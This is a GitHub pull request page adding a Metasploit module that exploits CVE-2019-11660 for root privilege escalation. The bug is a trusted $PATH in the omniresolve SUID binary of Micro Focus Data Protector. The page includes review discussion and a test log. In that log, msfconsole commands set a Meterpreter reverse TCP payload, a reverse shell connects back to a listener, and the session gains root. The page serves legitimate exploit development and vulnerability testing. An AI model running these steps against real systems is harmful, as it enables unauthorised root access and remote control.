Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Linux Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660) #12382

Merged
merged 12 commits into from Nov 1, 2019

Conversation

@s7u55
Copy link
Contributor

s7u55 commented Oct 1, 2019

Add Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660).

  This module exploits the trusted $PATH environment
  variable of the SUID binary `omniresolve` in
  Micro Focus (HPE) Data Protector A.10.40 and prior.

  The `omniresolve` executable calls the `oracleasm` binary using
  a relative path and the trusted $PATH, which allows an attacker
  to execute a custom binary with `root` privileges.
@bcoles bcoles added docs module labels Oct 2, 2019
s7u55 and others added 6 commits Oct 2, 2019
Co-Authored-By: bcoles <bcoles@gmail.com>
…v_esc.md

Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
…v_esc.md

Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
@h00die h00die changed the title Add Privilege Escalation Module (CVE-2019-11660) Add Linux Micro Focus (HPE) Data Protector Privilege Escalation Module (CVE-2019-11660) Oct 2, 2019
Co-Authored-By: Valeri Melnikov <MelnikoffVA@yandex.ru>
@bcoles
bcoles approved these changes Oct 3, 2019
Copy link
Contributor

bcoles left a comment

LGTM. Ready for testing.

@s7u55

This comment has been minimized.

Copy link
Contributor Author

s7u55 commented Oct 3, 2019

Test against Micro Focus Data Protector 10.40

msf5 exploit(multi/handler) > use exploit/linux/local/omniresolve_suid_priv_esc
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > show options

Module options (exploit/linux/local/omniresolve_suid_priv_esc):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   SESSION                                yes       The session to run this module on.
   SUID_PATH  /opt/omni/lbin/omniresolve  yes       Path to suid executable omniresolve


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Micro Focus (HPE) Data Protector <= 10.40 build 118


msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set lhost eth0

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1
session => 1

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check
[+] The target is vulnerable.
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run

[*] Started reverse TCP handler on 192.168.0.108:4444 
[*] Sending stage (3021284 bytes) to 192.168.0.110
[*] Meterpreter session 2 opened (192.168.0.108:4444 -> 192.168.0.110:36754) at 2019-10-03 14:37:43 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.110
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.21.2.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Test against Micro Focus Data Protector 10.50 (Patched version)

msf5 exploit(linux/local/omniresolve_suid_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.0.108:4444 
[-] omniresolve version 10.40 build 125 is not vulnerable
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/omniresolve_suid_priv_esc) > 

The vendor changed omniresolve build, but not the version in DP 10.50.

@s7u55

This comment has been minimized.

Copy link
Contributor Author

s7u55 commented Oct 29, 2019

The older versions are not available on the official website.
I can upload one somewhere if you need.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Oct 29, 2019

The older versions are not available on the official website.
I can upload one somewhere if you need.

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

@s7u55

This comment has been minimized.

Copy link
Contributor Author

s7u55 commented Oct 30, 2019

The older versions are not available on the official website.
I can upload one somewhere if you need.

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

have you received the link?

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Oct 31, 2019

The older versions are not available on the official website.
I can upload one somewhere if you need.

Please do. If you don't want to make the link public, you can email myself and/or msfdev[at]metasploit.com .

have you received the link?

Yes, thanks, I'll take a look between now and Sunday (probably earlier). Please update the ForceExploit functionality, as per above, if you have time.

@bcoles bcoles self-assigned this Oct 31, 2019
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Nov 1, 2019

Hi @s7u55

Tested successfully on CentOS 7 (x64).

I've made some small changes in c6e739c. I hope you're ok with the changes. Please let me know, else I'll proceed with landing this PR.

The changes mostly consist of:

  • minor formatting for module description
  • updating ForceExploit as discussed above
  • changed @ instance variables to local variables
  • appended echo to the cmd_exec call to fix a stupid bug related to framework command tokenisation #12485 (unrelated to this module) which caused the specified session to die if the session was a command shell session.
  • change print_ methods in check to vprint_
  • print the omniresolve version in check, regardless of whether the version is vulnerable
  • return Appears, rather than Vulnerable, as the vulnerability is inferred, rather than confirmed.
@bcoles bcoles removed the needs-testing label Nov 1, 2019
@bcoles
bcoles approved these changes Nov 1, 2019
@s7u55

This comment has been minimized.

Copy link
Contributor Author

s7u55 commented Nov 1, 2019

Hello.
That's perfect, thanks.

bcoles added a commit that referenced this pull request Nov 1, 2019
…rivesc (CVE-2019-11660)
@bcoles bcoles merged commit b08e031 into rapid7:master Nov 1, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Nov 1, 2019

Hello.
That's perfect, thanks.

Cool. Landed in master. Unfortunately I think we've missed the point release for this week. It will be in next week's release.

@bcoles bcoles added the rn-modules label Nov 1, 2019
msjenkins-r7 added a commit that referenced this pull request Nov 1, 2019
…rivesc (CVE-2019-11660)
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Nov 1, 2019

Release Notes

Add Micro Focus (HPE) Data Protector Privilege Escalation module for CVE-2019-11660. This module exploits the omniresolve SUID root executable installed as part of Data Protector to gain root privileges by abusing a trusted $PATH.

@s7u55 s7u55 deleted the s7u55:add-omniresolve-module branch Nov 2, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.